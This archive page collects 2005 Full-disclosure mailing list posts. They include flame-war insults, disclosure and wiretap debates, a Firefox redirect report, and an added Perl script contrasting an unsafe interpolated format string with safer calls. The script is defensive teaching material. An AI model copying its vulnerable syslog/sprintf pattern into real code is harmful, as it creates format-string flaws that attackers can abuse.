2005-12-12 Thread Stan Bubrouski
On 12/11/05, n3td3v [EMAIL PROTECTED] wrote:
 This list is for people to disclose security information, not for
 random people to disrespect others who do disclose vulnerabilities. It

THAT IS ALL YOU DO!!!  You post some XSS vuln somewhere then criticize
everyone else on the list while touting how awesome and l337 you are. 
If all you did was post vulnerabilities do you think people would
start threads dedicated to your stupidity?


 was a personal attack, because you're trying to make fun of serious
 comments i've made. You've taken all of the quotes out of context, so
 they make little sense to anyone.


The problem is you are a tool.  You find a bug in Yahoo or Google then
diss the other 7 billion people who haven't or haven't bothered.  You
then presume they are not as skilled as you then put them down in the
most childish ways while criticizing them for doing the same in return.

You then continue to start threads, spread misinformation about people
and then tell them they're stupid.

Suggestion: Turn off your computer and go back to watching Sesame
Street on your PSP.

-sb

 On 12/11/05, Steve Russell [EMAIL PROTECTED] wrote:
  It was not a personal attack - it was humour, the
  difference being you obviously cannot tell them apart.



Re: [Full-disclosure] Re: Format String Vulnerabilities in Perl Programs

2005-12-03 Thread Stan Bubrouski
On 12/3/05, Michael J. Pomraning [EMAIL PROTECTED] wrote:
SNIP
 For Perl projects, I'd also nominate syslog(), from the standard Sys::Syslog
 module, for special attention.  It's common in *NIX environments regardless
 of programmers' backgrounds and is extremely likely to be called with
 untrusted data interpolated directly in the format string argument --
 syslog("info", "A user said $user_input"), for example.


This has been mentioned numerous times, including this week (?), nothing new.

-sb

 Regards,
 Mike

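
Added example, not part of the original thread: the interpolated-format pattern from the quoted message next to two safer call shapes. Perl's sprintf stands in here for a printf-style logger such as syslog($priority, $format, @args) so the script runs without a syslog daemon; format_log, escape_format and the sample values are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Format a log line with sprintf (stand-in for a printf-style logger) and
# count the warnings sprintf raises instead of printing them.
sub format_log {
    my ($format, @args) = @_;
    my @warnings;
    local $SIG{__WARN__} = sub { push @warnings, $_[0] };
    my $line = sprintf $format, @args;
    return ($line, scalar @warnings);
}

# Double every '%' so a value is inert if it must sit inside a format string.
sub escape_format {
    my ($value) = @_;
    (my $escaped = $value) =~ s/%/%%/g;
    return $escaped;
}

# Constructed sample values (not taken from a real log).
my $user_input = 'alice %s logged out %d';
my $client_ip  = '192.0.2.10';

my @cases = (
    # Pattern from the quoted message: input interpolated into the format,
    # so its directives compete with the real ones for the arguments.
    [ 'interpolated', "login failed for $user_input from %s", $client_ip ],
    # Constant format; untrusted data is passed only as arguments.
    [ 'as argument', 'login failed for %s from %s', $user_input, $client_ip ],
    # Interpolation kept, but directives in the value are neutralised first.
    [ 'escaped',
      'login failed for ' . escape_format($user_input) . ' from %s',
      $client_ip ],
);

for my $case (@cases) {
    my ($label, $format, @args) = @$case;
    my ($line, $warned) = format_log($format, @args);
    printf "%-12s %s   [sprintf warnings: %d]\n", $label, $line, $warned;
}

# With Sys::Syslog the constant-format shape would be:
#   syslog('info', 'A user said %s', $user_input);
```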


Re: [Full-disclosure] Clever crooks can foil wiretaps, security flaw in tap technology

2005-11-30 Thread Stan Bubrouski
While you make some valid points, let's not escalate this to another
political discussion ;-)

-sb

On 11/30/05, Dude VanWinkle [EMAIL PROTECTED] wrote:
 On 11/30/05, Andy Lindeman [EMAIL PROTECTED] wrote:
  I think we're talking about legal wiretaps, e.g. a law enforcement
  agency with a court order.  The problem is if you can easily fool the
  system, the evidence is possibly unreliable and/or tainted.  However,
  even if you can temporarily fool the law enforcement agency in
  question, it's doubtful this would keep you out of trouble for long.

 If law enforcement is involved in a wiretap, that means they don't have
 enough evidence to convict you. Even if they do have enough evidence
 to convict you, they have yet to do so, or you wouldn't be on the
 phone. This means they are snooping on innocent civilians by providing
 circumstantial evidence to a judge (or, since the Provide Appropriate
 Tools Required to Intercept and Obstruct Terrorism act, they may not
 even need a warrant)

 Either way, this is a bad tangent to go off on. That was a great study
 done, and shouldn't be trivialized by my ramblings.

 Does anyone know of a C-Tone for GPS devices? ;-)

 -JP



Re: [Full-disclosure] Fwd: Forwarding comments to FD

2005-11-20 Thread Stan Bubrouski
Man these threads are just a waste of space... can't you guys just
settle this with a pissing contest or in an octagon of death? or
better yet just kill each other?  I liked it much better when you all
responded to separate threads and ignored each other's existence.

-sb

On 11/19/05, Bernhard Mueller [EMAIL PROTECTED] wrote:
 n3td3v wr04t3:

   I have been a continued provider of raw intelligence to Yahoo...

 This probably explains why Yahoo has zero clue about security :)

 --



Re: [Full-disclosure] Websites vulnerabilities disclosure

2005-10-07 Thread Stan Bubrouski
On 10/6/05, Georgi Guninski [EMAIL PROTECTED] wrote:
 On Thu, Oct 06, 2005 at 09:09:32AM +0400, offtopic wrote:
  snip Which third-party can't be used as coordinator, like CERT/CC?

 i recommend you don't use coordinators - they are f*ck*d parasites.
 think about what they will coordinate - probably selling your info.
 cert* sux.

I really agree with this.  When you're a researcher who puts the time
in to discovering, exploiting, and sometimes fixing a vulnerability,
you've done the work, why let them steal the credit?

There are times when you find holes that you report to one of these
services because you have no time or motivation to do the research
yourself.  But if you want the credit for what you've done or even
feedback then writing up your own advisory or working on one with a
vendor is a much better solution.  After all, what do these services
offer that you can't do yourself?

Best Regards,
sb



 --
 where do you want bill gates to go today?



Re: [Full-disclosure] (no subject)

2005-08-09 Thread Stan Bubrouski
LOL, and he didn't put a subject on either message...

On 8/9/05, KF (lists) [EMAIL PROTECTED] wrote:
 Maybe next I can enjoy a subject line?
 -KF
 
SNIP


[Full-disclosure] Weird firefox symptom

2005-06-06 Thread Stan Bubrouski
Hey,

I don't ordinarily send messages like this, but I find it kinda
disturbing.  I opened up firefox today (v1.0.2 I know it's old but I
haven't used this PC in a while), and typed:
www.espn.com

into the address bar only to find myself at:
http://www.megago.com/l/?

I checked the address bar history and it indeed showed that I had
typed http://www.espn.com

So I tried again.  I made sure I typed www.espn.com and once again
ended up at http://www.megago.com/l/?

The third time was a charm.  ESPN actually loaded.  Checked firefox
directories for any rogue extensions or modified files and nothing had
been modified since I updated the User Agent Switcher extension on
5/16/05.  I ran NAV and MS Anti-Spyware and nothing was found.  Which
makes sense since I only use Mozilla and have A LOT of sites blocked
using adblock extension.  So I'm kind of at a loss.  I can't reproduce
it atm but I'm just wondering has anyone else seen this before and
could it just be a firefox bug?

-sb


Re: [Full-disclosure] (no subject)

2005-04-26 Thread Stan Bubrouski
Paul Schmehl wrote:
 --On Tuesday, April 26, 2005 03:05:29 PM -0400 Stan Bubrouski
 [EMAIL PROTECTED] wrote:

  Could we can the nazi rhetoric in messages on this list?  Or can we just
  complain until the list
  loses its hosting?

 That makes a great deal of sense.  One poster sends stuff you find
 offensive, so you want to shut down the entire list?

hehe i just meant before someone else who found it offensive did
something more drastic than whine on the list
about it.  Clearly shutting down the list would not be in my interest.

-sb

 Yeah, makes perfect sense.  Next you'll tell us you're going to take
 your ball and go home.

 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 The University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu